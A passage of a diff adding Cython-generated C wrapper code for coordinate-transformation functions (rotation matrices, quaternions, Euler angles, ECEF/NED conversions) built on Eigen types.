numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) # <<<<<<<<<<<<<< + * return [q.w(), q.x(), q.y(), q.z()] + * + */ + __pyx_v_q = rot2quat(__pyx_v_r); + + /* "common/transformations/transformations.pyx":75 + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) + * return [q.w(), q.x(), q.y(), q.z()] # <<<<<<<<<<<<<< + * + * def euler2rot_single(euler): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_q.w()); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_q.x()); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_q.y()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_q.z()); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = PyList_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_4, 0, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_4, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_4, 2, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_4, 3, __pyx_t_2); + __pyx_t_5 = 0; + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":72 + * return matrix2numpy(r) + * + * def rot2quat_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("common.transformations.transformations.rot2quat_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":77 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def euler2rot_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_9euler2rot_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_9euler2rot_single = {"euler2rot_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_9euler2rot_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_9euler2rot_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_euler = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("euler2rot_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_euler,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_euler)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 77, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "euler2rot_single") < 0)) __PYX_ERR(0, 77, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_euler = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("euler2rot_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 77, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.euler2rot_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_8euler2rot_single(__pyx_self, __pyx_v_euler); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_8euler2rot_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_euler) { + Eigen::Vector3d __pyx_v_e; + Eigen::Matrix3d __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + double __pyx_t_3; + double __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("euler2rot_single", 0); + + /* "common/transformations/transformations.pyx":78 + * + * def euler2rot_single(euler): + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) # <<<<<<<<<<<<<< + * cdef Matrix3 r = euler2rot_c(e) + * return matrix2numpy(r) + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_e = Eigen::Vector3d(__pyx_t_2, __pyx_t_3, __pyx_t_4); + + /* "common/transformations/transformations.pyx":79 + * def euler2rot_single(euler): + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) # <<<<<<<<<<<<<< + * return matrix2numpy(r) + * + */ + __pyx_v_r = euler2rot(__pyx_v_e); + + /* "common/transformations/transformations.pyx":80 + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) + * return matrix2numpy(r) # <<<<<<<<<<<<<< + * + * def rot2euler_single(rot): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((PyObject *)__pyx_f_6common_15transformations_15transformations_matrix2numpy(__pyx_v_r)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":77 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def euler2rot_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.euler2rot_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":82 + * return matrix2numpy(r) + * + * def rot2euler_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_11rot2euler_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_11rot2euler_single = {"rot2euler_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_11rot2euler_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_11rot2euler_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_rot = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("rot2euler_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_rot,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_rot)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 82, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "rot2euler_single") < 0)) __PYX_ERR(0, 82, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_rot = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("rot2euler_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 82, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.rot2euler_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10rot2euler_single(__pyx_self, __pyx_v_rot); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10rot2euler_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_rot) { + Eigen::Matrix3d __pyx_v_r; + Eigen::Vector3d __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + Eigen::Matrix3d __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("rot2euler_single", 0); + + /* "common/transformations/transformations.pyx":83 + * + * def rot2euler_single(rot): + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) # <<<<<<<<<<<<<< + * cdef Vector3 e = rot2euler_c(r) + * return [e(0), e(1), e(2)] + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_rot); + __Pyx_GIVEREF(__pyx_v_rot); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_rot); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_double); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 83, __pyx_L1_error) + __pyx_t_6 = __pyx_f_6common_15transformations_15transformations_numpy2matrix(((PyArrayObject *)__pyx_t_5)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 83, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_r = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_6); + + /* "common/transformations/transformations.pyx":84 + * def rot2euler_single(rot): + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) # <<<<<<<<<<<<<< + * return [e(0), e(1), e(2)] + * + */ + __pyx_v_e = rot2euler(__pyx_v_r); + + /* "common/transformations/transformations.pyx":85 + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) + * return [e(0), e(1), e(2)] # <<<<<<<<<<<<<< + * + * def rot_matrix(roll, pitch, yaw): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_e(0)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_e(1)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_e(2)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 85, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_2, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_2, 2, __pyx_t_1); + __pyx_t_5 = 0; + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":82 + * return matrix2numpy(r) + * + * def rot2euler_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("common.transformations.transformations.rot2euler_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":87 + * return [e(0), e(1), e(2)] + * + * def rot_matrix(roll, pitch, yaw): # <<<<<<<<<<<<<< + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_13rot_matrix(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_13rot_matrix = {"rot_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_13rot_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_13rot_matrix(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_roll = 0; + PyObject *__pyx_v_pitch = 0; + PyObject *__pyx_v_yaw = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("rot_matrix (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_roll,&__pyx_n_s_pitch,&__pyx_n_s_yaw,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_roll)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 87, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pitch)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 87, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("rot_matrix", 1, 3, 3, 1); __PYX_ERR(0, 87, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_yaw)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 87, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("rot_matrix", 1, 3, 3, 2); __PYX_ERR(0, 87, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "rot_matrix") < 0)) __PYX_ERR(0, 87, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_roll = values[0]; + __pyx_v_pitch = values[1]; + __pyx_v_yaw = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("rot_matrix", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 87, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.rot_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_12rot_matrix(__pyx_self, __pyx_v_roll, __pyx_v_pitch, __pyx_v_yaw); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_12rot_matrix(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_roll, PyObject *__pyx_v_pitch, PyObject *__pyx_v_yaw) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + double __pyx_t_1; + double __pyx_t_2; + double __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("rot_matrix", 0); + + /* "common/transformations/transformations.pyx":88 + * + * def rot_matrix(roll, pitch, yaw): + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) # <<<<<<<<<<<<<< + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_PyFloat_AsDouble(__pyx_v_roll); if (unlikely((__pyx_t_1 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_v_pitch); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_v_yaw); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_t_4 = ((PyObject *)__pyx_f_6common_15transformations_15transformations_matrix2numpy(rot_matrix(__pyx_t_1, __pyx_t_2, __pyx_t_3))); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":87 + * return [e(0), e(1), e(2)] + * + * def rot_matrix(roll, pitch, yaw): # <<<<<<<<<<<<<< + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("common.transformations.transformations.rot_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":90 + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_15ecef_euler_from_ned_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_15ecef_euler_from_ned_single = {"ecef_euler_from_ned_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_15ecef_euler_from_ned_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_15ecef_euler_from_ned_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ecef_init = 0; + PyObject *__pyx_v_ned_pose = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ecef_euler_from_ned_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = 